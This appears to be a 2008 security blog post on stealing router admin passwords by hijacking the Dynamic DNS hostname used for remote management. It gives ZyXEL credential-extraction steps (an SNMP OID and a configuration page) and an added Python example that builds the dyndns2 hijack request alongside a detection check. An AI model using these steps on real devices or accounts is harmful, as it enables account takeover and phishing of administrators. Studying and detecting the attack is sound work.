Friday, 28 March 2008

Capturing admin passwords of embedded devices via Dynamic DNS poisoning

Sometimes, when an embedded device such as a DSL home router is compromised (e.g. via an authentication bypass vulnerability), the attacker will attempt to extract the administrator's password. This is often possible by saving a backup of the configuration file (e.g. via the web management console) and inspecting its contents. Occasionally, the admin password can be found in the HTML source of pages within the device's web interface, sometimes "hidden" in an input field of type="password", whose value is masked on screen but still readable in the page source. A third possibility is that the admin password can be read via SNMP read access.

However, what happens if these techniques fail? There is another technique the attacker can use to steal the admin password. The only requirement is that the administrator connects to the target device via a Dynamic DNS hostname at some point in time. The idea is that the attacker launches a phishing attack against the admin user by means of Dynamic DNS poisoning.

As with traditional DNS poisoning attacks, Dynamic DNS poisoning causes a domain name requested by the victim to resolve to an IP address controlled by the attacker. Such an attack could serve many purposes, such as exploiting the user's browser in order to install malware or launching a phishing attack.

However, there is a difference between classic DNS poisoning attacks and Dynamic DNS poisoning attacks on embedded devices: the attacker doesn't need to attack the DNS servers in charge of the target domain, nor to spoof responses on the network. Instead, the attacker compromises the DDNS service account that controls the target hostname, and the service's own name servers then publish the attacker's record as a perfectly legitimate update.

For instance, there are at least two ways to obtain the credentials of the Dynamic DNS account that a ZyXEL Prestige router uses for the hostname its administrator manages it through remotely.

The first method is to snmpwalk the OID 1.3.6.1.4.1.890.1.2.1.2 using the read-only SNMP community string. The second method consists of accessing the DDNS configuration page (/rpDyDNS.html) on the device's web interface. Note: you might want to check out our ZyXEL routers security paper for more info.

Either method provides the attacker with the credentials needed to hijack the admin user's Dynamic DNS account at www.dyndns.com. At this point, the attacker can make the hostname the administrator uses to connect to the ZyXEL router remotely (e.g. zyxel01.company.dyndns.org) resolve to any IP address of his/her choice. By pointing it at a web server that returns a login page identical to the ZyXEL router's login page, the attacker captures the admin account's password as soon as the admin user logs in. Note that the hostname in the browser's address bar is exactly the one the administrator always types, so over a plain HTTP management interface there is nothing to alert the victim that the page is not the router's.
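The hijack step and the corresponding defender-side check, as an added example that is not part of the original post nor any ZyXEL or DynDNS code: the attacker-side function builds the dyndns2 update request (the update protocol spoken by DynDNS-compatible services; the endpoint URL is assumed, and every hostname, credential and address below is constructed for illustration), and the defender-side function compares what the hostname resolves to against the router's known WAN address, flagging the re-point.

```python
"""Dynamic DNS poisoning, worked from both sides (added example, not from the post).

Attacker side: with the DDNS credentials pulled off the router (via SNMP or
/rpDyDNS.html, as described above), re-point the hostname with a dyndns2
update request. Defender side: detect the re-point by comparing what the
hostname resolves to against the router's real WAN address.
All hostnames, credentials and addresses below are constructed.
"""
import base64
import socket
from urllib.parse import urlencode

# Assumption: the classic dyndns2 update endpoint; other DDNS providers speak
# the same protocol on their own hosts.
DYNDNS_UPDATE_URL = "https://members.dyndns.org/nic/update"

# Status codes defined by the dyndns2 protocol (first token of the response).
UPDATE_STATUS = {
    "good": "update accepted; the hostname now points at the new address",
    "nochg": "address unchanged (repeated nochg updates count as abuse)",
    "badauth": "username/password rejected",
    "notfqdn": "hostname is not a fully-qualified domain name",
    "nohost": "hostname does not exist under this account",
    "abuse": "hostname blocked for abuse",
    "911": "server-side failure, retry later",
}


def build_update_request(hostname, new_ip, username, password):
    """Return (url, headers) for a dyndns2 update pointing *hostname* at *new_ip*.

    This single GET is all the hijacker needs once the account credentials are
    known: they travel in an HTTP Basic Authorization header, the hostname and
    the attacker-controlled address in the query string.
    """
    query = urlencode({"hostname": hostname, "myip": new_ip})
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = {
        "Authorization": f"Basic {token}",
        # dyndns2 servers expect an identifying User-Agent.
        "User-Agent": "ddns-poison-demo/0.1 (example@example.invalid)",
    }
    return f"{DYNDNS_UPDATE_URL}?{query}", headers


def parse_update_response(body):
    """Split a dyndns2 reply such as 'good 203.0.113.5' into (status, detail, meaning)."""
    parts = body.strip().split(None, 1)
    status = parts[0] if parts else ""
    detail = parts[1] if len(parts) > 1 else ""
    return status, detail, UPDATE_STATUS.get(status, "unknown status")


def check_ddns_hostname(hostname, expected_ips, resolver=None):
    """Defender-side check: does *hostname* resolve only to the router's WAN address(es)?

    *resolver* maps a name to a list of addresses and is injectable so the check
    can be exercised offline; by default the system resolver is used.
    Returns (ok, unexpected_addresses).
    """
    def system_resolver(name):
        return socket.gethostbyname_ex(name)[2]

    resolver = resolver or system_resolver
    try:
        resolved = set(resolver(hostname))
    except socket.gaierror as exc:
        # A name that stops resolving is also worth an alert, so fail closed.
        return False, [f"resolution failed: {exc}"]
    unexpected = sorted(resolved - set(expected_ips))
    return not unexpected, unexpected


def demo():
    """Walk through the scenario from the post with constructed data."""
    hostname = "zyxel01.company.dyndns.org"
    router_wan_ip = "198.51.100.20"   # what the hostname legitimately points at
    attacker_ip = "203.0.113.5"       # where the look-alike login page lives
    stolen_user, stolen_pass = "company-admin", "Pr3stige!"   # read off the router

    url, headers = build_update_request(hostname, attacker_ip, stolen_user, stolen_pass)
    # The request would be sent with urllib.request; here we only build it and
    # feed in the reply a dyndns2 server gives when the update is accepted.
    status, detail, meaning = parse_update_response(f"good {attacker_ip}")

    # After the update, any resolver the administrator uses sees the attacker.
    def poisoned_resolver(name):
        return [attacker_ip]

    ok, unexpected = check_ddns_hostname(hostname, {router_wan_ip}, poisoned_resolver)
    return {"url": url, "status": status, "meaning": meaning,
            "ok": ok, "unexpected": unexpected}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run the check from a host independent of the router, since a compromised device's own DNS settings may also be under the attacker's control, and learn the expected WAN address from the device or the ISP rather than from DNS: at the DDNS provider, a poisoned record is indistinguishable from a legitimate address change made with the account's own credentials.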
